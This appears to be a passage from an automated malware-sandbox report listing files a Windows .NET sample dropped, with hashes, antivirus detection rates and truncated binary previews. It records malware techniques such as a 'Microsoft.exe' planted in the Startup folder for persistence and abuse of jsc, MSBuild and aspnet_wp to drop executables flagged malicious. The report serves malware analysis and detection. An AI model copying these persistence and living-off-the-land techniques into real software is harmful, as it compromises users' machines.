                                                                                                                                                                                          SHA-512:02F88DA4B610678C31664609BCFA9D61DB8D0B0617649981AF948F670F41A6207B4EC19FECCE7385A24E0C609CBBF3F2B79A8ACAF09A03C2C432CC4DCE75E9DB
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:MSCF............,...................O.................2Wqh .disallowedcert.stl....^K...CK.wTS...:.w.K'.C0T.....Bh.{....C.).*.....Y@...(..).R."E..D^6........u....|f~3...o.3. ..SPK.k.o#...."{-.U..P........:..aPr.@.d......Dy.h.....)..:...!./\A.....A<I_<$...q.h..........'.....7....H...@`T..K.S.%...Y4..R.....`.....-....D...(..b..-c."...G.=.dx..S+..2.a.E....d.L...77J...c.[..@..iT&..^78..g....NW6.Ek..FY.F........cNt.O.*..R....*......D...... k........J.y...z.d...;.9_t...].@....yw..}.x....d.t..`f\K..;|.*h.X...4/.;.xT......q>.0...<...3...X..L$.&.,b.....\V....\......G..O..@..H3.....t..J..).x.?.{[..G>.7...<...^Q..z..Gw9P..d....i].n%K}.*z..2.Py...A..s...z..@...4..........4.....*Y.d..._Z.5.s..fl.C..#.K{9^.E...k..z.Ma..G.(.....5g. ...}.t.#4....$;.,....S@fs....k......u .^2.#_...I........;.......w..P...UCY...$;.S._|.x..dK...[i..q..^.l..A.?.....'N.. .L.l......m.*.+f#]............A.;.....Z..rIt....RW....Kr1e=8.=.z:Oi.z.d..r..C_......o...]j.N;.s....3@3.dgrv.

                                                                                                                                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:modified
                                                                                                                                                                                          Size (bytes):338
                                                                                                                                                                                          Entropy (8bit):3.1689404034189526
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6:kKHUCyN+SkQlPlEGYRMY9z+s3Ql2DUevat:PB5kPlE99SCQl2DUevat
                                                                                                                                                                                          MD5:0CE3668331116DC2C269DBDDBE8E265F
                                                                                                                                                                                          SHA1:A344A6A45E436B95A93ED1402014DB082FC1007A
                                                                                                                                                                                          SHA-256:0D8206E3887335A745DD4E0A461D12B59CD53ECDBA7656D9A9634A0205301010
                                                                                                                                                                                          SHA-512:624000980BFFFDCAE03A7A6EC64A4A7B03C060C0920822975968090F348241A6308200CD156B9694259F5E9C5A83AD9C808E626616C8DFDDEC7AF50DEC0A1356
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:p...... .........H.....(....................................................... .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\msbuild.exe.log

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):321
                                                                                                                                                                                          Entropy (8bit):5.36509199858051
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6:Q3La/xwchM3RJoDLIP12MUAvvR+uCqDLIP12MUAvvR+uTL2ql2ABgTv:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAv
                                                                                                                                                                                          MD5:3C63E66D9AEEF8DBC085D1459854EE3E
                                                                                                                                                                                          SHA1:770A084649B3A7D9CB0CF1A5B922FE2AC9D59122
                                                                                                                                                                                          SHA-256:06DF1E84C6419E6B0752C1CFD1B9D51A5D3EC1BC44513B5C1EB7400FA18760C4
                                                                                                                                                                                          SHA-512:8626E48E0854AC46C4024F00A6FF170EFE896C06D2E37022FE6F757FBD933EEE00E97D977F5B13CA5A41822651E32469B152778B04296657E0B4F19DEF18F103
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):64
                                                                                                                                                                                          Entropy (8bit):1.1940658735648508
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:NlllulxmH/lZ:NllUg
                                                                                                                                                                                          MD5:D904BDD752B6F23D81E93ECA3BD8E0F3
                                                                                                                                                                                          SHA1:026D8B0D0F79861746760B0431AD46BAD2A01676
                                                                                                                                                                                          SHA-256:B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2
                                                                                                                                                                                          SHA-512:5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:@...e................................. ..............@..........

                                                                                                                                                                                          C:\Users\user\AppData\Local\ServiceHub\msbuild.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):262432
                                                                                                                                                                                          Entropy (8bit):6.179415524830389
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:7a0t0yH5wCwie3NnQNLpj/Wnqvsw2XpFU4rwOeTubZSzf02RFihx2uzj:m0ny3nnKpqnZRXfw702birr/
                                                                                                                                                                                          MD5:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                          SHA1:E6256A0159688F0560B015DA4D967F41CBF8C9BD
                                                                                                                                                                                          SHA-256:ED9884BAC608C06B7057037CC91D90E4AE5F74DD2DBCE2AF476699C6D4492D82
                                                                                                                                                                                          SHA-512:BD69D092ED4F9C5E1F24EAF5EC79FB316469D53849DC798FAE0FCBA5E90869B77EE924C23CC6F692198FF25827AB60AD47BB46CADD6E0AADDE7731CBAFB013BE
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: KFpBzffEaM.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: LMcGYzntaD.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: Order 72005918536.bat.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: Pitsn.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: ujWn3eOza6.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: PANELLI_s.r.l._.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: CDGT003983765367VND--30983RDGHJ.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: 7nwLP8vlHl.exe, Detection: malicious, Browse
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.].........."...0..|...B......:.... ........@.. ...............................L....`....................................O........>.............. A........................................................... ............... ..H............text...Xz... ...|.................. ..`.rsrc....>.......@...~..............@..@.reloc..............................@..B........................H........)...................|..........................................*.{.......*v.(=....r...p({...-..+..}....*....0..%........(....-..*....(z.....&..}.........*.*....................0..5........(....-..*.-.r+..ps>...z.....i(z.....&..}.........*.*............%......>....(?...(....*N..(@....oA...(....*:...(B...(....*:...(C...(....**....(....*....0..G........(....,..*..(....-...}.....*.r...p(x...&.(v.....}......&..}.........*.*..........7.......0..f........-.r7..ps>...z .....

                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_clt0zb5m.tew.ps1

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ii40d0gv.52f.psm1

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o1rhrphd.bpp.ps1

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t2g2xhwy.jqz.psm1

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\hgzxhw.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):402454
                                                                                                                                                                                          Entropy (8bit):7.956202925572555
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12288:ZtLhXjSIa8550C4CrkE7ZeW9QcVbqZ/ITCZ:LhTGbAwE7n9rVbq/ITCZ
                                                                                                                                                                                          MD5:3F3A51617811E9581ABA50376599EFA6
                                                                                                                                                                                          SHA1:9B26AA73F43A4DB9B216B90D1AA3E2E4D602FDE8
                                                                                                                                                                                          SHA-256:5F3403E13E316D9320D46233E9F62B183623C46EC80C6C55139EFDD72C5ADA37
                                                                                                                                                                                          SHA-512:9AD5CFB29281DD462B726C7EE239926F83050181FE4F6C3E9057E51DF65AE7F850CECBF1CB453287720314275335DF36BB8D5299D09A1F73329A5B9292DB3EE3
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 35%
                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 49%, Browse
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....E..........."...0................. ....@...... ....................................`.............................................................................................8............................................................ ..H............text....... ...................... ..`.rsrc...............................@..@........................................H........<..Zd......]...\...............................................H...........n\m..}~'.A.1..>C#\.d.......F.\.H~.z'.d.k..gF~.....o....o....*F~.....o....o....*"..(....*Vs.........s.........*..(....*:.(......}....*Z.r...pr...pr...p(....*J..r...pr...p(....*:...r...p(....*..((...*..{....*"..}....*..{....*"..}....*..{....*"..}....*..()...*"..o*...*..{....*"..}....*..{....*"..}....*..{....*"..}....*.*.*.*2.r...p($...*6..r...p(/...*..(P...*"(Q.....*6.......(S...*>........(U...&*......

                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\ohvrxt.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):17267312
                                                                                                                                                                                          Entropy (8bit):7.999808518761566
                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                          SSDEEP:393216:n08SuFARbcMeyEjnSB1rPHaEHwRgSqdxYhZymNcQOYJO:nKuFyeyEjurPHaEHLxmRO
                                                                                                                                                                                          MD5:D01B812C108576056594805B6E9E7064
                                                                                                                                                                                          SHA1:290FC3E50CF13A1595F1BA3357285153AC98834D
                                                                                                                                                                                          SHA-256:9A6AC9ACC3267FC22ECD8872E3E9D863DCE608D609EE06FB0769B599CE669EC4
                                                                                                                                                                                          SHA-512:D3709B4A6760E149BCD774F7648857A47161E7144530E3D1AE700B33861837D494D646BB8ACCD3980B3CCB955682C9C1EBE2C3F22371FB9566F669C48FB09BE4
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 62%
                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 50%, Browse
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....5..........."...0..[............... ....@...... ....................................`.........................................................................................${..8............................................................ ..H............text....[... ...\.................. ..`.rsrc................^..............@..@........................................H.......xh..............lz..............................................H.......2~.....o,...*2~.....o,...*Vs2........s2........*..(3...*:.(3.....}....*6.(4....(....*..(5...*z.,..{....,..{....o6.....(7...*..r...p(....~N...oO........r...p(....oP...-..+...(Q...*f.,..,...,...,...i..i..*.*.r{..p(....(....r3..p(....(.........(V...(W...t........o....*R.oh.......ioi......*.*..(....*....( ...}5.......( ...Z}6......( ...}7...*V.(#...-.(z...*.({...*"..(|...*..*..(}...*"..(~...*"..(....*"..(....

                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\spczxf.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):774166
                                                                                                                                                                                          Entropy (8bit):7.984554592928592
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12288:gectZ++Vhu0XzXNiKj5JS9Tt0zfjq2g0L5OaWXnqtw9xJvZ5UFX5ZMA:G++ru0jgKj5zjTHL5anqAnZ5UzKA
                                                                                                                                                                                          MD5:D76027FE4CFD48C7F8999C796E50E731
                                                                                                                                                                                          SHA1:5026422E84BF445E2D141529E2B808187A30D9F6
                                                                                                                                                                                          SHA-256:148DA274864C690A7C01119E025BDC0AB94FA9C110C30AFB42E51B1C990A2799
                                                                                                                                                                                          SHA-512:2E2C4A5319A61555913648702DDCFB8B40D548DCFDA1A536A2E85F9CB85D25D9A463743DC866F86B4DE99FD10F9C402DEF424B9E8A203189518F45E924B89D2D
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 41%
                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 48%, Browse
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....E..........."...0.................. ....@...... ....................................`.............................................................................................8............................................................ ..H............text........ ...................... ..`.rsrc...............................@..@........................................H........<..Fc......]...H...............................................H.......G.....).%8Y#...b."....w..O....6M`...o..X_C.:.N.F~.....o....o....*F~.....o....o....*"..(....*Vs.........s.........*..(....*:.(......}....*Z.rU..prW..prU..p(....*J..rW..prU..p(....*:...rU..p(....*..((...*..{....*"..}....*..{....*"..}....*..{....*"..}....*..()...*"..o*...*..{....*"..}....*..{....*"..}....*..{....*"..}....*.*.*.*2.rW..p($...*6..rW..p(/...*..(P...*"(Q.....*6.......(S...*>........(U...&*......

                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\utntwb.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                          Category:modified
                                                                                                                                                                                          Size (bytes):3288598
                                                                                                                                                                                          Entropy (8bit):7.998801276427663
                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                          SSDEEP:98304:QB1NPKFmefBA+MShHfYBb5IuwGHV3dnwzfk2NccsS+:QB7gtJfwiGHVNwbnNccsS+
                                                                                                                                                                                          MD5:86E00D529B3B454A84B942AC916211E3
                                                                                                                                                                                          SHA1:021C733E5448436B384BF0D3A0BA81F4D0D93F9A
                                                                                                                                                                                          SHA-256:30E01B261CB5D7524A303CDBE9D177FC05D74279642E4A87B46EE70045E68D53
                                                                                                                                                                                          SHA-512:9A08379B35A3BF1699B925C6DBFC6E85123F1155E567929EAFF3683E5E9F196A16775E3A2F6A7585F7C0F0F201EF4BE009CDA5CF94B160742642145837C3DE1E
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 46%
                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 32%, Browse
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....E..........."...0.................. ....@...... ....................................`.........................................................................................`...8............................................................ ..H............text........ ...................... ..`.rsrc...............................@..@........................................H........<...d......]...................................................H.........H... ..Yt..+d..v...}EMa....4W..<W.)..&s.xd.F~.....o....o....*F~.....o....o....*"..(....*Vs.........s.........*..(....*:.(......}....*Z.rf..prh..prf..p(....*J..rh..prf..p(....*:...rf..p(....*..((...*..{....*"..}....*..{....*"..}....*..{....*"..}....*..()...*"..o*...*..{....*"..}....*..{....*"..}....*..{....*"..}....*.*.*.*2.rh..p($...*6..rh..p(/...*..(P...*"(Q.....*6.......(S...*>........(U...&*......

                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe
                                                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):45448
                                                                                                                                                                                          Entropy (8bit):6.39682271149109
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:PjdwXPJ7EY8pcuOjkZaEMQyT8EZwJOjYRL0juqIy5e:PjY7cRO4a0A8Euj0ju3qe
                                                                                                                                                                                          MD5:10072393B2116AF4483194F101923CA4
                                                                                                                                                                                          SHA1:431B2746B95F7A3A782BE631BBE8351BDA9B7C5E
                                                                                                                                                                                          SHA-256:AFDF6F2793B96BAF7BEE4E5D28054EAA761BC70A8F65BC4E0AE7C4CEC3B54C2B
                                                                                                                                                                                          SHA-512:406C65EA5C34CA65DCC5C2A47486379B935FA897F2561559787197721445D922E73C3B99C1F4931763A45BEABA05CA097582F619ECFACF856091BE4C2B4C8E4C
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Q.Ll.."?.."?.."?..#>.."?..!>.."?..&>.."?..'>.."?..?.."?..#>.."?..?.."?..?.."?..#?.."?..'>.."?..">.."?...?.."?.. >.."?Rich.."?........................PE..d......b.........."......R...8.......V.........@..........................................`.......... ..................................4...4...x.......T................#......L...Pz..T............................y...............p..........@....................text....Q.......R.................. ..`.rdata...#...p...$...V..............@..@.data................z..............@....pdata...............|..............@..@.didat..(...........................@....rsrc...T...........................@..@.reloc..L...........................@..B................................................................................................................................................................................

                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\tc.txt

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe
                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):10
                                                                                                                                                                                          Entropy (8bit):2.321928094887362
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:LaC:OC
                                                                                                                                                                                          MD5:414AAB43F9EA61FCBC874CD99A7333B3
                                                                                                                                                                                          SHA1:9B219911932D66A3778B0BE22F65E6ECB4065CA5
                                                                                                                                                                                          SHA-256:D60D0AEA31404CBFE682B9EC609EFEF424DE7A8934D860005C5AC94175B38858
                                                                                                                                                                                          SHA-512:6853114A57B863F75E9103470B9420C7F622CAFCD74108A14C72AC4E746016E6677BA0D09B53BF260AF260A5423F957F35EEFD827E249795DBA7588438278A95
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:1711617952

                                                                                                                                                                                          C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):55
                                                                                                                                                                                          Entropy (8bit):4.306461250274409
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                          C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1835008
                                                                                                                                                                                          Entropy (8bit):4.4293312515886205
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6144:Wcifpi6ceLPL9skLmb0mwSWSPtaJG8nAgex285i2MMhA20X4WABlGuNB5+:zi58wSWIZBk2MM6AFBvo
                                                                                                                                                                                          MD5:6191E5A49033BB26A01EE194FD795530
                                                                                                                                                                                          SHA1:C2CD7B9A755F9BB88B31550551E9A6A272A8B55D
                                                                                                                                                                                          SHA-256:DBC8DA2EB3C3D7CA8B4DFE92F9A077C07DAE46E2124042C000364945AFED5226
                                                                                                                                                                                          SHA-512:900035742E8C47D9FA05E70850BD82718CEC0A3BBB4759B8FE52CE68E9548277C7E5FF245B73D919B07F8F442CC3A747F06FC88C21897D0014681D306B5DB431
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:regfI...I....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.1..................................................................................................................................................................................................................................................................................................................................................k..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          \Device\ConDrv

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ServiceHub\msbuild.exe
                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):298
                                                                                                                                                                                          Entropy (8bit):4.924206445966445
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6:zx3M1tFAbQtASR30qyMstwYVoRRZBXVN+J0fFdCsq2UTiMdH8stCal+n:zK13P30ZMt9BFN+QdCT2UftCM+
                                                                                                                                                                                          MD5:932782CF70ED00D22C0B08B5027B4E31
                                                                                                                                                                                          SHA1:78F460A2155D9E819B8452C281285D7E0A7AC14F
                                                                                                                                                                                          SHA-256:F2C2477FB3FD0A30F3D3D8637EF9C774B43E940043635DF90CDD804799A2ECE7
                                                                                                                                                                                          SHA-512:C83E72797C03CABCAB066B95BAEEBB13944143846794061CF9482EA3B283979E470930047FDAE72A6F06F51F3127FF39DAAEFAAD7557E3AD49F590B9E7B78D24
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:Microsoft (R) Build Engine version 4.8.4084.0..[Microsoft .NET Framework, version 4.0.30319.42000]..Copyright (C) Microsoft Corporation. All rights reserved.....MSBUILD : error MSB1003: Specify a project or solution file. The current working directory does not contain a project or solution file...

                                                                                                                                                                                          Static File Info

                                                                                                                                                                                          General

                                                                                                                                                                                          File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                          Entropy (8bit):7.879944031563754
                                                                                                                                                                                          TrID:
                                                                                                                                                                                          • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                          • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.92%
